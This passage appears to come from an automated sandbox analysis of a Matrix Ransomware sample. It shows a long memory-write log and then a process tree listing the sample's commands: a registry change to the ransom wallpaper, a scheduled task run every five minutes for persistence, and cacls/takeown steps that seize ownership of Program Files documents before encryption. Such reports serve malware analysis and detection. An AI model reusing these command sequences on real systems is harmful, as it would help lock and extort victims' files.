744 cmd.exe 1240 PID 744 wrote to memory of 560 744 cmd.exe 1240 PID 744 wrote to memory of 560 744 cmd.exe 1240 PID 744 wrote to memory of 560 744 cmd.exe 1240 PID 1908 wrote to memory of 1228 1908 cmd.exe 1241 PID 1908 wrote to memory of 1228 1908 cmd.exe 1241 PID 1908 wrote to memory of 1228 1908 cmd.exe 1241 PID 1908 wrote to memory of 1228 1908 cmd.exe 1241 PID 1460 wrote to memory of 572 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1242 PID 1460 wrote to memory of 572 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1242 PID 1460 wrote to memory of 572 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1242 PID 1460 wrote to memory of 572 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1242 PID 572 wrote to memory of 1820 572 cmd.exe 1244 PID 572 wrote to memory of 1820 572 cmd.exe 1244 PID 572 wrote to memory of 1820 572 cmd.exe 1244 PID 572 wrote to memory of 1820 572 cmd.exe 1244 PID 572 wrote to memory of 1824 572 cmd.exe 1245 PID 572 wrote to memory of 1824 572 cmd.exe 1245 PID 572 wrote to memory of 1824 572 cmd.exe 1245 PID 572 wrote to memory of 1824 572 cmd.exe 1245 PID 572 wrote to memory of 1800 572 cmd.exe 1246 PID 572 wrote to memory of 1800 572 cmd.exe 1246 PID 572 wrote to memory of 1800 572 cmd.exe 1246 PID 572 wrote to memory of 1800 572 cmd.exe 1246 PID 1800 wrote to memory of 1636 1800 cmd.exe 1247 PID 1800 wrote to memory of 1636 1800 cmd.exe 1247 PID 1800 wrote to memory of 1636 1800 cmd.exe 1247 PID 1800 wrote to memory of 1636 1800 cmd.exe 1247 PID 572 wrote to memory of 1224 572 cmd.exe 1248 PID 572 wrote to memory of 1224 572 cmd.exe 1248 PID 572 wrote to memory of 1224 572 cmd.exe 1248 PID 572 wrote to memory of 1224 572 cmd.exe 1248 PID 1460 wrote to memory of 204 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1249 PID 1460 wrote to memory of 204 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1249 PID 1460 wrote to memory of 204 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1249 PID 1460 wrote to memory of 204 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1249 PID 204 wrote to memory of 396 204 cmd.exe 1251 PID 204 wrote to memory of 396 204 cmd.exe 1251 PID 204 wrote to memory of 396 204 cmd.exe 1251 PID 204 wrote to memory of 396 204 cmd.exe 1251 PID 204 wrote to memory of 1696 204 cmd.exe 1252 PID 204 wrote to memory of 1696 204 cmd.exe 1252 PID 204 wrote to memory of 1696 204 cmd.exe 1252 PID 204 wrote to memory of 1696 204 cmd.exe 1252 PID 204 wrote to memory of 1412 204 cmd.exe 1253 PID 204 wrote to memory of 1412 204 cmd.exe 1253 PID 204 wrote to memory of 1412 204 cmd.exe 1253 PID 204 wrote to memory of 1412 204 cmd.exe 1253 PID 1412 wrote to memory of 828 1412 cmd.exe 1254 PID 1412 wrote to memory of 828 1412 cmd.exe 1254 PID 1412 wrote to memory of 828 1412 cmd.exe 1254 PID 1412 wrote to memory of 828 1412 cmd.exe 1254 PID 204 wrote to memory of 952 204 cmd.exe 1255 PID 204 wrote to memory of 952 204 cmd.exe 1255 PID 204 wrote to memory of 952 204 cmd.exe 1255 PID 204 wrote to memory of 952 204 cmd.exe 1255 PID 1460 wrote to memory of 1804 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1256 PID 1460 wrote to memory of 1804 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1256 PID 1460 wrote to memory of 1804 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1256 PID 1460 wrote to memory of 1804 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1256 PID 1804 wrote to memory of 1568 1804 cmd.exe 1258 PID 1804 wrote to memory of 1568 1804 cmd.exe 1258 PID 1804 wrote to memory of 1568 1804 cmd.exe 1258 PID 1804 wrote to memory of 1568 1804 cmd.exe 1258 PID 1804 wrote to memory of 1876 1804 cmd.exe 1259 PID 1804 wrote to memory of 1876 1804 cmd.exe 1259 PID 1804 wrote to memory of 1876 1804 cmd.exe 1259 PID 1804 wrote to memory of 1876 1804 cmd.exe 1259 PID 1804 wrote to memory of 780 1804 cmd.exe 1260 PID 1804 wrote to memory of 780 1804 cmd.exe 1260 PID 1804 wrote to memory of 780 1804 cmd.exe 1260 PID 1804 wrote to memory of 780 1804 cmd.exe 1260 PID 780 wrote to memory of 1928 780 cmd.exe 1261 PID 780 wrote to memory of 1928 780 cmd.exe 1261 PID 780 wrote to memory of 1928 780 cmd.exe 1261 PID 780 wrote to memory of 1928 780 cmd.exe 1261 PID 1804 wrote to memory of 744 1804 cmd.exe 1262 PID 1804 wrote to memory of 744 1804 cmd.exe 1262 PID 1804 wrote to memory of 744 1804 cmd.exe 1262 PID 1804 wrote to memory of 744 1804 cmd.exe 1262 PID 1460 wrote to memory of 1228 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1263 PID 1460 wrote to memory of 1228 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1263 PID 1460 wrote to memory of 1228 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1263 PID 1460 wrote to memory of 1228 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1263 PID 1228 wrote to memory of 1596 1228 cmd.exe 1265 PID 1228 wrote to memory of 1596 1228 cmd.exe 1265 PID 1228 wrote to memory of 1596 1228 cmd.exe 1265 PID 1228 wrote to memory of 1596 1228 cmd.exe 1265 PID 1228 wrote to memory of 1820 1228 cmd.exe 1266 PID 1228 wrote to memory of 1820 1228 cmd.exe 1266 PID 1228 wrote to memory of 1820 1228 cmd.exe 1266 PID 1228 wrote to memory of 1820 1228 cmd.exe 1266 PID 1228 wrote to memory of 1824 1228 cmd.exe 1267 PID 1228 wrote to memory of 1824 1228 cmd.exe 1267 PID 1228 wrote to memory of 1824 1228 cmd.exe 1267 PID 1228 wrote to memory of 1824 1228 cmd.exe 1267 PID 1824 wrote to memory of 1380 1824 cmd.exe 1268 PID 1824 wrote to memory of 1380 1824 cmd.exe 1268 PID 1824 wrote to memory of 1380 1824 cmd.exe 1268 PID 1824 wrote to memory of 1380 1824 cmd.exe 1268 PID 1228 wrote to memory of 1256 1228 cmd.exe 1269 PID 1228 wrote to memory of 1256 1228 cmd.exe 1269 PID 1228 wrote to memory of 1256 1228 cmd.exe 1269 PID 1228 wrote to memory of 1256 1228 cmd.exe 1269 PID 1460 wrote to memory of 1224 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1270 PID 1460 wrote to memory of 1224 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1270 PID 1460 wrote to memory of 1224 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1270 PID 1460 wrote to memory of 1224 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1270 PID 1224 wrote to memory of 1084 1224 cmd.exe 1272 PID 1224 wrote to memory of 1084 1224 cmd.exe 1272 PID 1224 wrote to memory of 1084 1224 cmd.exe 1272 PID 1224 wrote to memory of 1084 1224 cmd.exe 1272 PID 1224 wrote to memory of 396 1224 cmd.exe 1273 PID 1224 wrote to memory of 396 1224 cmd.exe 1273 PID 1224 wrote to memory of 396 1224 cmd.exe 1273 PID 1224 wrote to memory of 396 1224 cmd.exe 1273 PID 1224 wrote to memory of 1696 1224 cmd.exe 1274 PID 1224 wrote to memory of 1696 1224 cmd.exe 1274 PID 1224 wrote to memory of 1696 1224 cmd.exe 1274 PID 1224 wrote to memory of 1696 1224 cmd.exe 1274 PID 1696 wrote to memory of 1856 1696 cmd.exe 1275 PID 1696 wrote to memory of 1856 1696 cmd.exe 1275 PID 1696 wrote to memory of 1856 1696 cmd.exe 1275 PID 1696 wrote to memory of 1856 1696 cmd.exe 1275 PID 1224 wrote to memory of 1412 1224 cmd.exe 1276 PID 1224 wrote to memory of 1412 1224 cmd.exe 1276 PID 1224 wrote to memory of 1412 1224 cmd.exe 1276 PID 1224 wrote to memory of 1412 1224 cmd.exe 1276 PID 1460 wrote to memory of 952 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1277 PID 1460 wrote to memory of 952 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1277 PID 1460 wrote to memory of 952 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1277 PID 1460 wrote to memory of 952 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1277 PID 952 wrote to memory of 1920 952 cmd.exe 1279 PID 952 wrote to memory of 1920 952 cmd.exe 1279 PID 952 wrote to memory of 1920 952 cmd.exe 1279 PID 952 wrote to memory of 1920 952 cmd.exe 1279 PID 952 wrote to memory of 1568 952 cmd.exe 1280 PID 952 wrote to memory of 1568 952 cmd.exe 1280 PID 952 wrote to memory of 1568 952 cmd.exe 1280 PID 952 wrote to memory of 1568 952 cmd.exe 1280 PID 952 wrote to memory of 1876 952 cmd.exe 1281 PID 952 wrote to memory of 1876 952 cmd.exe 1281 PID 952 wrote to memory of 1876 952 cmd.exe 1281 PID 952 wrote to memory of 1876 952 cmd.exe 1281 PID 1876 wrote to memory of 560 1876 cmd.exe 1282 PID 1876 wrote to memory of 560 1876 cmd.exe 1282 PID 1876 wrote to memory of 560 1876 cmd.exe 1282 PID 1876 wrote to memory of 560 1876 cmd.exe 1282 PID 952 wrote to memory of 780 952 cmd.exe 1283 PID 952 wrote to memory of 780 952 cmd.exe 1283 PID 952 wrote to memory of 780 952 cmd.exe 1283 PID 952 wrote to memory of 780 952 cmd.exe 1283 PID 1460 wrote to memory of 744 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1284 PID 1460 wrote to memory of 744 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1284 PID 1460 wrote to memory of 744 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1284 PID 1460 wrote to memory of 744 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1284 PID 744 wrote to memory of 336 744 cmd.exe 1286 PID 744 wrote to memory of 336 744 cmd.exe 1286 PID 744 wrote to memory of 336 744 cmd.exe 1286 PID 744 wrote to memory of 336 744 cmd.exe 1286 PID 744 wrote to memory of 1596 744 cmd.exe 1287 PID 744 wrote to memory of 1596 744 cmd.exe 1287 PID 744 wrote to memory of 1596 744 cmd.exe 1287 PID 744 wrote to memory of 1596 744 cmd.exe 1287 PID 744 wrote to memory of 1820 744 cmd.exe 1288 PID 744 wrote to memory of 1820 744 cmd.exe 1288 PID 744 wrote to memory of 1820 744 cmd.exe 1288 PID 744 wrote to memory of 1820 744 cmd.exe 1288 PID 1820 wrote to memory of 1028 1820 cmd.exe 1289 PID 1820 wrote to memory of 1028 1820 cmd.exe 1289 PID 1820 wrote to memory of 1028 1820 cmd.exe 1289 PID 1820 wrote to memory of 1028 1820 cmd.exe 1289 PID 744 wrote to memory of 1824 744 cmd.exe 1290 PID 744 wrote to memory of 1824 744 cmd.exe 1290 PID 744 wrote to memory of 1824 744 cmd.exe 1290 PID 744 wrote to memory of 1824 744 cmd.exe 1290 PID 1460 wrote to memory of 2036 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1291 PID 1460 wrote to memory of 2036 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1291 PID 1460 wrote to memory of 2036 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1291 PID 1460 wrote to memory of 2036 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1291 PID 2036 wrote to memory of 216 2036 cmd.exe 1293 PID 2036 wrote to memory of 216 2036 cmd.exe 1293 PID 2036 wrote to memory of 216 2036 cmd.exe 1293 PID 2036 wrote to memory of 216 2036 cmd.exe 1293 PID 2036 wrote to memory of 1084 2036 cmd.exe 1294 PID 2036 wrote to memory of 1084 2036 cmd.exe 1294 PID 2036 wrote to memory of 1084 2036 cmd.exe 1294 PID 2036 wrote to memory of 1084 2036 cmd.exe 1294 PID 2036 wrote to memory of 396 2036 cmd.exe 1295 PID 2036 wrote to memory of 396 2036 cmd.exe 1295 PID 2036 wrote to memory of 396 2036 cmd.exe 1295 PID 2036 wrote to memory of 396 2036 cmd.exe 1295 PID 396 wrote to memory of 828 396 cmd.exe 1296 PID 396 wrote to memory of 828 396 cmd.exe 1296 PID 396 wrote to memory of 828 396 cmd.exe 1296 PID 396 wrote to memory of 828 396 cmd.exe 1296 PID 2036 wrote to memory of 1696 2036 cmd.exe 1297 PID 2036 wrote to memory of 1696 2036 cmd.exe 1297 PID 2036 wrote to memory of 1696 2036 cmd.exe 1297 PID 2036 wrote to memory of 1696 2036 cmd.exe 1297 PID 1460 wrote to memory of 1412 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1298 PID 1460 wrote to memory of 1412 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1298 PID 1460 wrote to memory of 1412 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1298 PID 1460 wrote to memory of 1412 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1298 PID 1412 wrote to memory of 208 1412 cmd.exe 1300 PID 1412 wrote to memory of 208 1412 cmd.exe 1300 PID 1412 wrote to memory of 208 1412 cmd.exe 1300 PID 1412 wrote to memory of 208 1412 cmd.exe 1300 PID 1412 wrote to memory of 1920 1412 cmd.exe 1301 PID 1412 wrote to memory of 1920 1412 cmd.exe 1301 PID 1412 wrote to memory of 1920 1412 cmd.exe 1301 PID 1412 wrote to memory of 1920 1412 cmd.exe 1301 PID 1412 wrote to memory of 1536 1412 cmd.exe 1302 PID 1412 wrote to memory of 1536 1412 cmd.exe 1302 PID 1412 wrote to memory of 1536 1412 cmd.exe 1302 PID 1412 wrote to memory of 1536 1412 cmd.exe 1302 PID 1536 wrote to memory of 1144 1536 cmd.exe 1303 PID 1536 wrote to memory of 1144 1536 cmd.exe 1303 PID 1536 wrote to memory of 1144 1536 cmd.exe 1303 PID 1536 wrote to memory of 1144 1536 cmd.exe 1303 PID 1412 wrote to memory of 896 1412 cmd.exe 1304 PID 1412 wrote to memory of 896 1412 cmd.exe 1304 PID 1412 wrote to memory of 896 1412 cmd.exe 1304 PID 1412 wrote to memory of 896 1412 cmd.exe 1304 PID 1460 wrote to memory of 800 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1305 PID 1460 wrote to memory of 800 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1305 PID 1460 wrote to memory of 800 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1305 PID 1460 wrote to memory of 800 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1305 PID 800 wrote to memory of 880 800 cmd.exe 1307 PID 800 wrote to memory of 880 800 cmd.exe 1307 PID 800 wrote to memory of 880 800 cmd.exe 1307 PID 800 wrote to memory of 880 800 cmd.exe 1307 PID 800 wrote to memory of 940 800 cmd.exe 1308 PID 800 wrote to memory of 940 800 cmd.exe 1308 PID 800 wrote to memory of 940 800 cmd.exe 1308 PID 800 wrote to memory of 940 800 cmd.exe 1308 PID 800 wrote to memory of 1636 800 cmd.exe 1309 PID 800 wrote to memory of 1636 800 cmd.exe 1309 PID 800 wrote to memory of 1636 800 cmd.exe 1309 PID 800 wrote to memory of 1636 800 cmd.exe 1309 PID 1636 wrote to memory of 788 1636 cmd.exe 1310 PID 1636 wrote to memory of 788 1636 cmd.exe 1310 PID 1636 wrote to memory of 788 1636 cmd.exe 1310 PID 1636 wrote to memory of 788 1636 cmd.exe 1310 PID 800 wrote to memory of 832 800 cmd.exe 1311 PID 800 wrote to memory of 832 800 cmd.exe 1311 PID 800 wrote to memory of 832 800 cmd.exe 1311 PID 800 wrote to memory of 832 800 cmd.exe 1311
Processes
-
C:\Users\Admin\AppData\Local\Temp\7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe"C:\Users\Admin\AppData\Local\Temp\7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe"1⤵
- Matrix Ransomware
- Modifies extensions of user files
- Loads dropped DLL
- Drops desktop.ini file(s)
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:1460 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C copy /V /Y "C:\Users\Admin\AppData\Local\Temp\7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe" "C:\Users\Admin\AppData\Local\Temp\NWQdhQ0m.exe"2⤵PID:1504
-
-
C:\Users\Admin\AppData\Local\Temp\NWQdhQ0m.exe"C:\Users\Admin\AppData\Local\Temp\NWQdhQ0m.exe" -n2⤵
- Executes dropped EXE
PID:1780
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\UzFx8zyz.bmp" /f & reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f & reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f2⤵
- Suspicious use of WriteProcessMemory
PID:1116 -
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\UzFx8zyz.bmp" /f3⤵
- Sets desktop wallpaper using registry
- Modifies Control Panel
PID:1568
-
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f3⤵
- Modifies Control Panel
PID:1504
-
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f3⤵
- Modifies Control Panel
PID:1824
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\3dDQlT9m.vbs"2⤵
- Suspicious use of WriteProcessMemory
PID:1908 -
C:\Windows\SysWOW64\wscript.exewscript //B //Nologo "C:\Users\Admin\AppData\Roaming\3dDQlT9m.vbs"3⤵
- Suspicious use of WriteProcessMemory
PID:1492 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\9Tln0auk.bat" /sc minute /mo 5 /RL HIGHEST /F4⤵
- Suspicious use of WriteProcessMemory
PID:880 -
C:\Windows\SysWOW64\schtasks.exeschtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\9Tln0auk.bat" /sc minute /mo 5 /RL HIGHEST /F5⤵
- Creates scheduled task(s)
PID:1224
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C schtasks /Run /I /tn DSHCA4⤵PID:1692
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Run /I /tn DSHCA5⤵PID:1912
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\PDFSigQFormalRep.pdf""2⤵
- Suspicious use of WriteProcessMemory
PID:1772 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\PDFSigQFormalRep.pdf" /E /G Admin:F /C3⤵PID:1992
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\PDFSigQFormalRep.pdf"3⤵
- Modifies file permissions
PID:1264
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "PDFSigQFormalRep.pdf" -nobanner3⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1180 -
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "PDFSigQFormalRep.pdf" -nobanner4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:472 -
C:\Users\Admin\AppData\Local\Temp\jigPt9cX64.exejigPt9cX.exe -accepteula "PDFSigQFormalRep.pdf" -nobanner5⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Enumerates connected drives
- Modifies service
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: LoadsDriver
- Suspicious use of AdjustPrivilegeToken
PID:1388
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf""2⤵
- Loads dropped DLL
PID:1316 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf" /E /G Admin:F /C3⤵PID:1152
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf"3⤵PID:1020
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "Dynamic.pdf" -nobanner3⤵
- Loads dropped DLL
PID:1916 -
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "Dynamic.pdf" -nobanner4⤵
- Executes dropped EXE
PID:864
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:336
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf""2⤵
- Loads dropped DLL
PID:1780 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf" /E /G Admin:F /C3⤵PID:1068
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf"3⤵PID:832
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "SignHere.pdf" -nobanner3⤵
- Loads dropped DLL
PID:1568 -
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "SignHere.pdf" -nobanner4⤵
- Executes dropped EXE
PID:1260
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1872
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf""2⤵
- Loads dropped DLL
PID:1596 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf" /E /G Admin:F /C3⤵PID:1992
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf"3⤵PID:396
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "StandardBusiness.pdf" -nobanner3⤵
- Loads dropped DLL
PID:1152 -
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "StandardBusiness.pdf" -nobanner4⤵
- Executes dropped EXE
PID:1020
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1828
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf""2⤵
- Loads dropped DLL
PID:432 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf" /E /G Admin:F /C3⤵PID:240
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf"3⤵PID:2008
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "ENUtxt.pdf" -nobanner3⤵
- Loads dropped DLL
PID:1492 -
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "ENUtxt.pdf" -nobanner4⤵
- Executes dropped EXE
PID:1428
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1144
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Program Files\Windows Journal\en-US\PDIALOG.exe.mui""2⤵
- Loads dropped DLL
PID:1568 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\en-US\PDIALOG.exe.mui" /E /G Admin:F /C3⤵PID:1824
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\en-US\PDIALOG.exe.mui"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1864
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "PDIALOG.exe.mui" -nobanner3⤵
- Loads dropped DLL
PID:1792 -
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "PDIALOG.exe.mui" -nobanner4⤵
- Executes dropped EXE
PID:320
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:564
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Program Files\Windows Journal\Templates\Music.jtp""2⤵
- Loads dropped DLL
PID:1152 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\Templates\Music.jtp" /E /G Admin:F /C3⤵PID:1640
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\Templates\Music.jtp"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1928
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "Music.jtp" -nobanner3⤵
- Loads dropped DLL
PID:336 -
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "Music.jtp" -nobanner4⤵
- Executes dropped EXE
PID:240
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1572
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Program Files\Windows Photo Viewer\en-US\PhotoAcq.dll.mui""2⤵
- Loads dropped DLL
PID:832 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Photo Viewer\en-US\PhotoAcq.dll.mui" /E /G Admin:F /C3⤵PID:1316
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Photo Viewer\en-US\PhotoAcq.dll.mui"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1496
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "PhotoAcq.dll.mui" -nobanner3⤵
- Loads dropped DLL
PID:1780 -
